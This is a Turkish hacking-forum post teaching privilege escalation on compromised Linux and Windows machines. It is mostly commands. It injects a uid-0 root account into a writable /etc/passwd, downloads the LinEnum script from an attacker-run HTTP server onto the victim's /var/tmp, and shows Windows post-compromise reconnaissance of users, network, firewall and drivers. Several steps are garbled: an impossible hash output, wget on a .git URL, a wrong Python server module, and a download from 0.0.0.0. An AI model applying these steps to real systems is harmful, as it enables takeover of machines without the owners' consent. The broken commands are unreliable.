



Herkese Selam Değerli TurkHackTeam Ailesi Bu konumda sizlere Windows Ve Linux İşletim sistemlerinde yetki yükseltmeyi yani root olmayı anlatacagım.





Neden Buna İhtiyacımız Olsun? :
Pentest İşlemi uygulayarak sızdıgımız sistemlerde erişemedigimiz dosyalara yada şifreli olan bilgileri görmemize açmamıza kolaylık saglar tüm yetkileri aldıgımız için istedigimiz herşeyi yapabiliyor oluruz bir nevi admin gibi.





1.Linux Yol ( etc/passwd) :
passwd bir text dosyasıdır Server Userlerinin bir belgelerini tutar. users id - group id - home id - shell id gibi bilgileri saklar. genel olarak hemen hemen çogu hesap için hashlenmiş pass leride içinde barındırır. /etc/passwd/ Belgesi users idlerinin isimleri ile dogrulamak için kullanılan tamamını okumak için bir izine sahiptir fakat içinden birşeyleri degiştirebilme hakkı sadece root ve superuser (sudo,sudosu) sahiptir. Egerki bu izin sadece 2 si için dogrulanmamış ise bu bir zafiyet oldugu anlamına gelir içinden istedigimiz bilgiyi çekip degiştirebiliriz demek olur
Kod:
openssl passwd -1 -salt [salt] [password]
Kod:
kali@root:~$ openssl passwd -1 -salt new 123
KxM12x5$+ASUhs#naHnaHpRtzNizS1
hash çıktı karışımza bunu degiştirmeden devam edelim. New root user account oluşturabilmek için /etc/passwd/ içine yazıcaklarımız
(root /yada herhangi birşey\: ve bir parola (hash) sonrasında şu şekilde devam ediyoruz:
Kod:
new:KxMjitem12x5$+ASUhs#naHnaHpRtzNizS1:0:0:root:/root:/bin/bash
sadecee 1 bölümü degişitererek devam ediyorumki şifrede bir degişiklik olsun diye arasına ( jitem ) yazdım
bunlarida tamamladıktan sonra artık bunu /etc/passwd/ textine tanımlamamız gerekiyor
Kod:
nano /etc/passwd
sonra degişiklik yaptıgımız passi tekrar yazıyoruz
Kod:
new:KxMjitem12x5$+ASUhs#naHnaHpRtzNizS1:0:0:root:/root:/bin/bash
enter yapıp çıkıyoruz
dilerseniz kontrol edebilirsiniz sonrasında
Yardımcı Programlar :
1-)Linenum
2-)Unix-Privesc-Check
3-)LinuxPrivChecker
4-)Linux-Local-Enum
5-)Linux-Exploit-Suggester
6-)KernelPop
7-)Linux_Exploit_Suggester
8-)LARE
9-)Elevator
10-)Linux Soft Exploit Suggester
11-)PrivEscalation
12-)Inspector
13-)MSF





2.Yol Linux( LinEnum ):
Linenum Nedir? : LinEnum yetki yükseltme ile ilgili kodları gerçekleştiren ve ciddi anlamda zamandan tasarruf saglayan ve kök yetki ( Root ) elde etmek için daha fazla çaba harcamamıza engel olan basit bir bash betiğidir
Kod:
kali@root:~$ mkdir linenum
kali@root:~$ cd linenum/
oluşturudugumuz klasöre github deposundan linenumu indirelim
Kod:
kali@root~/linenum$ wget https://github.com/rebootuser/LinEnum.git
Artık linenum github depomuz klasörümüzde olduguna göre linenumu hedefe sunmak için Python kullanacagız. Bunu yaparken en kolay yol olarak SimpleHTTPServer kullanmaktır
Kod:
kali@root~/linenum$ python3 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
aşşagı kısımda bulunan serving kısmınıda gördügümüze göre artık hizmete hazır hale geldigini belirtiyor ve 8000 portunda hizmet ettigini söylüyor dilerseniz istediginiz herhangi bir portuda seçebilirsiniz.
Kurban Makineye LinEnum Kurmak:
hedefe hangi dosyanın gitmesini istiyorsak rastgele bir dizine geçin. / Var / tmp burada işimizi görecektir.
Kod:
kali@root:~$ /var/www/dvwa/vulnerabilities/exec$ cd /var/tmp
Şimdi dosyayı hedefe aktramanın bir yolunu bulmamız gerekmektedir bunu Wget ve curl gibi araçlar dosyaları kapmanın kolay bir yolunu sunar. Hangi komutla neyin yüklü olduğunu kontrol edelim
Kod:
kali@root:~$ /var/tmp$ which wget
/var/tmp komudunu tercih ettigimiz için aynı komutla bir tekrar tarama yapıyoruz sonrasında LinEnumu Hedefe İndirmeye devam ediyoruz
Kod:
kali@root:~$ /var/tmp$ wget 0.0.0.0:8000/LinEnum.sh
Ardından İzinlerimizi Kontrol edelim eğer izinlerimiz yeterli değilse izin verelim :)
Kod:
kali@root:~$ :/var/tmp$ ls -l
egerki yeterli iznimiz yok ise hemen chmod komudu ile çalıştırabilir hale getirelim :)
Kod:
kali@root:~$ /var/tmp$ chmod +x LinEnum.sh
sonrasında kontrol için tekrardan
Kod:
kali@root:~$ :/var/tmp$ ls -l
ve artık çalışabiliyor olarak gözükmesi gerekmektedir :)





Windows Yetki Yükseltme:
İlk olarak yetki yükseltmeden önce sızdıgımız sistem hakkında bilgi toplamamız gerekir peki bunu nasıl yaparız ?
Kod:
C:\Windows\system32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 8 Professional
OS Version: 7.2.8501 Service Pack 2 Build 8501 (win kısmımız tamamen örnekler üzerine oluşcaktır)
Hangi işletim sistemine baglandıgımızı ögrendik şimdi ise bilgisayar adı ve admin adını görecegiz
Kod:
C:\Windows\system32> hostname
jitem
C:\Windows\system32> echo %username%
jitem123
Temel bilgilerimizi ögrendigimize göre devam edelim. dahada ayrıntıya girelim
Kod:
C:\Windows\system32> net users
User accounts for \\jitem1
-------------------------------------------------------------------------------
Administrator jitem1 Guest jitem123
The command completed successfully.
Kod:
C:\Windows\system32> net user jitem123
User name jitem123
Full Name
Comment
User's comment
Country code 090
Account active Yes
Account expires Never
Password last set 15.03.2021 11.05 AM
Password expires Never
Password changeable 15.03.2021 11.06 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 17.03.2021 13.59 PM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Ögrenmemiz gereken herşeyi ögrenmiş olduk sırada ise hangi ağa baglı oldugumuzu ögrenmek kaldı hemen onuda gerçekleştirelim
Kod:
C:\Windows\system32> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : jitem1
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
C:\Windows\system32> route print
================================================== =========================
Interface List
18...0c 84 dc 62 60 29 ......Bluetooth Device (Personal Area Network)
13...00 ff 0c 0d 4f ed ......TAP-Windows Adapter V9
11...00 0c 29 56 79 35 ......Intel(R) PRO/1000 MT Network Connection
1...........................Software Loopback Interface 1
16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
19...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
14...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
================================================== =========================
siz yukaridaki komutları gerçekleştirdiginizde karşınızda daha ayrıntılı bilgiler çıkacak ammavelakin ben uzamasını istemedigim için bazı yerlerini cmdden almıyorum
Kod:
:\Windows\system32> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 684
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:5354 0.0.0.0:0 LISTENING 1400
TCP 192.168.0.104:139 0.0.0.0:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 684
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5357 [::]:0 LISTENING 4
C:\Windows\system32> netsh firewall show state
Firewall status:
-------------------------------------------------------------------
Profile = Standard
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Group policy version = Windows Firewall
Remote admin mode = Disable
---------------------------------------------------------------------
Ports currently open on all network interfaces:
Port Protocol Version Program
C:\Windows\system32> netsh firewall show config
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
şimdi aşşagıda yazdıgım komut bazı büyük şirketler içerisinde bile açık içeriyor bu komut bazen yararlı olabilir.
çünkü ring0 sömürüsü çoğu insanın uzmanlığının dışında kalıyor eğer var ise toolslara başvurulabilir
Kod:
C:\Windows\system32> DRIVERQUERY
module Name Display Name Driver Type Link Date
============ ====================== ============= ======================
1394ohci 1394 OHCI Compliant Ho Kernel
ACPI Microsoft ACPI Driver Kernel
AcpiPmi ACPI Power Meter Drive Kernel
adp94xx adp94xx Kernel
adpahci adpahci Kernel
adpu320 adpu320 Kernel
AFD Ancillary Function Dri Kernel
agp440 Intel AGP Bus Filter Kernel
aic78xx aic78xx Kernel
aliide aliide Kernel
amdagp AMD AGP Bus Filter Dri Kernel
amdide amdide Kernel
AmdK8 AMD K8 Processor Drive Kernel
AmdPPM AMD Processor Driver Kernel
amdsata amdsata Kernel
amdsbs amdsbs Kernel
amdxata amdxata Kernel
AppID AppID Driver Kernel
arc arc Kernel
şimdi gerekli bilgileri topladıgımıza göre root olmaya geçelim :)





Microsoft 2000
Kod:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\>set systemroot
SystemRoot=C:\WINNT
C:\>
Windows 10
Kod:
Microsoft Windows [Version 10.0.17763.316]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\example>set systemroot
SystemRoot=C:\WINDOWS
C:\Users\example>
elimde başka sürümler olmadıgı için gerçekleştiremedim hemen hemen hepsi aynıdır zaten dostlarım :)
Evet Değerli TurkHackTeam Ailesi Bu konumda sizlere windows ve linux sistemlerde yetki yükseltmeyi elimden geldigince anlatım umarım beğenirsiniz. :)
İYİ FORUMLAR İYİ EĞLENCELER İYİ ŞANSLAR :diablo




